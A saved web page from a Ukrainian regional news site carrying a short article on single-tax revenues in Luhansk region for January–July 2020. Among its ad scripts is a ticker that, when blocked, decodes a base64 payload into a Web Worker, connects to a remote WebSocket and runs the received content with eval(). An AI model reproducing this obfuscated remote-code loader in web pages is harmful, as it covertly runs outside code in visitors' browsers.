<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>

<meta charset="utf-8">
<title>Местные громады Луганской области получили от упрощенцев почти 218 млн грн единого налога &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="В Главном управлении ГНС в Луганской области сообщили, что субъекты хозяйствования в январе - июле 2020 заплатили 217,8 млн грн единого налога. В Главном управлении ГНС в Луганской области сообщили, что субъекты хозяйствования в январе - июле 2020 заплатили 217,8 млн грн единого налога. В ведомстве">
<meta name="keywords" content="налога, единого, Главном, январь, гривен, управлении, заплатили, январе, хозяйствования, субъекты, сообщили, области, Луганской, сельскохозяйственные, товаропроизводители, сравнению, показателями, местных, поступления, увеличились">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Местные громады Луганской области получили от упрощенцев почти 218 млн грн единого налога">
<meta property="og:url" content="http://www.citynews.net.ua/news/84461-mestnye-gromady-luganskoj-oblasti-poluchili-ot-uproschencev-pochti-218-mln-grn-edinogo-naloga.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-08/thumbs/1597824844_grn.jpeg">
<meta property="og:description" content="В Главном управлении ГНС в Луганской области сообщили, что субъекты хозяйствования в январе - июле 2020 заплатили 217,8 млн грн единого налога.В ведомстве отметили, что основная часть поступлений единого налога, а это 127,7 грн, уплаченная физическими лицами - предпринимателями, которые работают на">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/84461-mestnye-gromady-luganskoj-oblasti-poluchili-ot-uproschencev-pochti-218-mln-grn-edinogo-naloga.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js,engine/classes/highslide/highslide.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; Местные громады Луганской области получили от упрощенцев почти 218 млн грн единого налога</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>Местные громады Луганской области получили от упрощенцев почти 218 млн грн единого налога</h1>
<a href="http://www.citynews.net.ua/2020/08/19/" ><span class="date">Сегодня, 11:13</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,84461-mestnye-gromady-luganskoj-oblasti-poluchili-ot-uproschencev-pochti-218-mln-grn-edinogo-naloga.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/84461-mestnye-gromady-luganskoj-oblasti-poluchili-ot-uproschencev-pochti-218-mln-grn-edinogo-naloga.html" data-title="Местные громады Луганской области получили от упрощенцев почти 218 млн грн единого налога"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><a href="http://www.citynews.net.ua/uploads/posts/2020-08/1597824844_grn.jpeg" class="highslide" target="_blank"><img src="/uploads/posts/2020-08/thumbs/1597824844_grn.jpeg" alt="" style="float:left;"></a>В Главном управлении ГНС в Луганской области сообщили, что субъекты хозяйствования в январе - июле 2020 заплатили 217,8 млн грн единого налога.<br>В ведомстве отметили, что основная часть поступлений единого налога, а это 127,7 грн, уплаченная физическими лицами - предпринимателями, которые работают на упрощенной системе налогообложения. Юридические лица - плательщики единого налога III группы перечислили в местную казну 17,5 млн грн, сельскохозяйственные товаропроизводители - 72,6 млн гривен.<br>По сравнению с показателями за январь - июль 2019 поступления единого налога увеличились на 22,3 млн грн или 11,4 процентов.<br>Напомним, всего за январь - июль 2020 году до местных бюджетов Луганщины поступило 1 млрд 966 млн гривен.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/news/84217-mestnye-bjudzhety-luganskoj-oblasti-poluchili-ot-uproschencev-pochti-178-mln-grn-edinogo-naloga.html">Местные бюджеты Луганской области получили от упрощенцев почти 178 млн грн единого налога</a></li><li><a href="http://www.citynews.net.ua/news/83672-bjudzhety-mestnyh-gromad-luganskoj-oblasti-poluchili-134-mln-griven-edinogo-naloga.html">Бюджеты местных громад Луганской области получили 134 млн гривень единого налога</a></li><li><a href="http://www.citynews.net.ua/news/82981-gromady-luganskoj-oblasti-poluchili-ot-uproschencev-535-mln-grn-edinogo-naloga.html">Громады Луганской области получили от упрощенцев 53,5 млн грн единого налога</a></li><li><a href="http://www.citynews.net.ua/news/81651-mestnye-gromady-luganskoj-oblasti-poluchili-2324-mln-griven-edinogo-naloga.html">Местные громады Луганской области получили 232,4 млн гривень единого налога</a></li><li><a href="http://www.citynews.net.ua/news/81295-mestnye-gromady-luganskoy-oblasti-poluchili-ot-uproschencev-200-mln-grn-edinogo-naloga.html">Местные громады Луганской области получили от упрощенцев 200 млн грн единого налога</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Сегодня, 11:16</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84462-v-severodonecke-lisichanske-i-stanice-luganskoj-vyjavleny-novye-sluchai-covid-19.html">В Северодонецке, Лисичанске и Станице Луганской выявлены новые случаи COVID-19</a></h4><span>Сегодня, 11:13</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84461-mestnye-gromady-luganskoj-oblasti-poluchili-ot-uproschencev-pochti-218-mln-grn-edinogo-naloga.html">Местные громады Луганской области получили от упрощенцев почти 218 млн грн единого налога</a></h4><span>Сегодня, 09:55</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84456-na-kpvv-v-luganskoj-i-doneckoj-oblastjah-pensioneram-predlagajut-falshivye-testy-na-covid-19.html">На КПВВ в Луганской и Донецкой областях  пенсионерам предлагают фальшивые тесты на COVID-19</a></h4><span>Сегодня, 09:46</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84455-v-ukraine-pochti-2000-novyh-sluchaev-covid-19-za-sutki.html">В Украине почти 2000 новых случаев COVID-19 за сутки</a></h4><span>Вчера, 16:44</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84451-rossija-prodolzhaet-postavljat-na-okkupirovannyj-donbass-oruzhie-i-bespilotniki.html">Россия продолжает поставлять на оккупированный Донбасс оружие и беспилотники</a></h4><span>Вчера, 15:23</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84449-v-stanice-luganskoj-otmetili-6-letie-osvobozhdenija-ot-rossijskih-terroristov.html">В Станице Луганской отметили 6-летие освобождения от российских террористов</a></h4><span>Вчера, 14:27</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84448-v-ntku-rasskazali-pochemu-ne-pustili-malchika-na-evrovidenie-smugljanka-ne-prichem.html">В НТКУ рассказали почему не пустили «мальчика» на Евровидение. Смуглянка не причем</a></h4><span>Вчера, 13:08</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84447-zelenskij-oficialno-naznachil-fokina-v-tkg-po-donbassu.html">Зеленский официально назначил Фокина в ТКГ по Донбассу</a></h4><span>Вчера, 12:57</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84446-za-17-avgusta-v-luganskoj-oblasti-podtverzhdeno-10-novyh-sluchaev-covid-19.html">За 17 августа в Луганской области подтверждено 10 новых случаев COVID-19</a></h4><span>Вчера, 12:10</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84445-novyj-rukovoditel-severodonecka-trebuet-myt-ruki-i-merjat-temperaturu-2-raza-v-den.html">Новый руководитель Северодонецка требует мыть руки и мерять температуру 2 раза в день</a></h4><span>Вчера, 11:27</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84444-v-luganskoj-oblasti-chut-ne-sgorela-lesopolosa-v-markovskom-rajone.html">В Луганской области чуть не сгорела лесополоса в Марковском районе</a></h4><span>Вчера, 11:24</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/84443-v-lisichanske-izjali-500-litrov-vodki-v-tetrapakah.html">В Лисичанске изъяли 500 литров водки в тетрапаках</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Вчера, 15:29</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84450-vo-lvove-sgorela-zhenschina-v-detskom-sadu.html">Во Львове сгорела женщина в детском саду</a></h4><span>Вчера, 09:24</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84440-v-harkove-s-17-avgusta-usilili-karantinnye-ogranichenija.html">В Харькове с 17 августа, усилили карантинные ограничения</a></h4><span>14-08-2020, 09:34</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84423-minaj-i-ingulec-iz-1-ligi-pereshli-v-ukrainskuju-premer-ligu.html">«Минай» и «Ингулец» из 1 лиги перешли в украинскую Премьер-лигу</a></h4><span>13-08-2020, 08:07</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84416-v-kieve-budut-perekryvat-ulicy-dlja-semok-filma-s-van-dammom.html">В Киеве будут перекрывать улицы для съемок фильма с Ван Даммом</a></h4><span>12-08-2020, 21:46</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84414-v-odesskoj-oblasti-podtverzhden-sluchaj-sibirskoj-jazvy.html">В Одесской области подтвержден случай сибирской язвы</a></h4><span>12-08-2020, 13:32</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84409-v-odesse-potrebovali-ubrat-kondicionery-so-zdanij-v-istoricheskom-centre.html">В Одессе потребовали убрать кондиционеры со зданий в историческом центре</a></h4><span>12-08-2020, 13:27</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84408-v-harkove-pereimenovali-stanciju-metro-moskovskij-prospekt.html">В Харькове переименовали станцию метро «Московский проспект»</a></h4><span>12-08-2020, 13:24</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84407-jeks-nardepa-aleksandra-shepeleva-prigovorili-k-7-godam-lishenija-svobody-za-vzjatku-i-pobeg.html">Экс-нардепа  Александра Шепелева приговорили  к 7 годам лишения свободы за взятку и побег</a></h4><span>6-08-2020, 15:16</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84376-v-kieve-iz-za-zhary-ogranichili-dvizhenie-gruzovyh-avtomobilej.html">В Киеве из-за жары ограничили движение грузовых автомобилей</a></h4><span>5-08-2020, 11:06</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84357-v-odesse-kinuli-2-granaty-v-avtomobil-rukovoditelja-mezhdunarodnoj-antikorrupcionnoj-assamblei.html">В Одессе кинули 2 гранаты в автомобиль руководителя «Международной антикоррупционной ассамблеи»</a></h4><span>4-08-2020, 12:50</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84347-vanna-v-spalne-dorogo-roskoshno-izyskanno.html">Ванна в спальне: дорого, роскошно, изысканно</a></h4><span>3-08-2020, 13:27</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/84341-v-kieve-muzhchina-zahvatil-pomeschenie-banka-v-biznes-centre-leonardo-ugrozhaet-vzryvchatkoj.html">В Киеве мужчина захватил помещение банка в бизнес-центре Леонардо - угрожает взрывчаткой</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
					<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1689781-1";
urchinTracker();
</script>

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('07','2020','right'); return false;" href="http://www.citynews.net.ua/2020/07/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Август 2020&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="5">&nbsp;</td><td  class="weekday" >1</td><td  class="weekday" >2</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/03/" title="Все публикации за 03 августа 2020">3</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/04/" title="Все публикации за 04 августа 2020">4</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/05/" title="Все публикации за 05 августа 2020">5</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/06/" title="Все публикации за 06 августа 2020">6</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/07/" title="Все публикации за 07 августа 2020">7</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/08/08/" title="Все публикации за 08 августа 2020">8</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/08/09/" title="Все публикации за 09 августа 2020">9</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/10/" title="Все публикации за 10 августа 2020">10</a></td><td  class="day" >11</td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/12/" title="Все публикации за 12 августа 2020">12</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/13/" title="Все публикации за 13 августа 2020">13</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/14/" title="Все публикации за 14 августа 2020">14</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/08/15/" title="Все публикации за 15 августа 2020">15</a></td><td  class="weekday" >16</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/17/" title="Все публикации за 17 августа 2020">17</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/18/" title="Все публикации за 18 августа 2020">18</a></td><td  class="day-active-v day-current" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/08/19/" title="Все публикации за 19 августа 2020">19</a></td><td  class="day" >20</td><td  class="day" >21</td><td  class="weekday" >22</td><td  class="weekday" >23</td></tr><tr><td  class="day" >24</td><td  class="day" >25</td><td  class="day" >26</td><td  class="day" >27</td><td  class="day" >28</td><td  class="weekday" >29</td><td  class="weekday" >30</td></tr><tr><td  class="day" >31</td><td colspan="6">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>Местные громады Луганской области получили от упрощенцев почти 218 млн грн единого налога &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="В Главном управлении ГНС в Луганской области сообщили, что субъекты хозяйствования в январе - июле 2020 заплатили 217,8 млн грн единого налога. В Главном управлении ГНС в Луганской области сообщили, что субъекты хозяйствования в январе - июле 2020 заплатили 217,8 млн грн единого налога. В ведомстве">
<meta name="keywords" content="налога, единого, Главном, январь, гривен, управлении, заплатили, январе, хозяйствования, субъекты, сообщили, области, Луганской, сельскохозяйственные, товаропроизводители, сравнению, показателями, местных, поступления, увеличились">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Местные громады Луганской области получили от упрощенцев почти 218 млн грн единого налога">
<meta property="og:url" content="http://www.citynews.net.ua/news/84461-mestnye-gromady-luganskoj-oblasti-poluchili-ot-uproschencev-pochti-218-mln-grn-edinogo-naloga.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-08/thumbs/1597824844_grn.jpeg">
<meta property="og:description" content="В Главном управлении ГНС в Луганской области сообщили, что субъекты хозяйствования в январе - июле 2020 заплатили 217,8 млн грн единого налога.В ведомстве отметили, что основная часть поступлений единого налога, а это 127,7 грн, уплаченная физическими лицами - предпринимателями, которые работают на">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/84461-mestnye-gromady-luganskoj-oblasti-poluchili-ot-uproschencev-pochti-218-mln-grn-edinogo-naloga.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
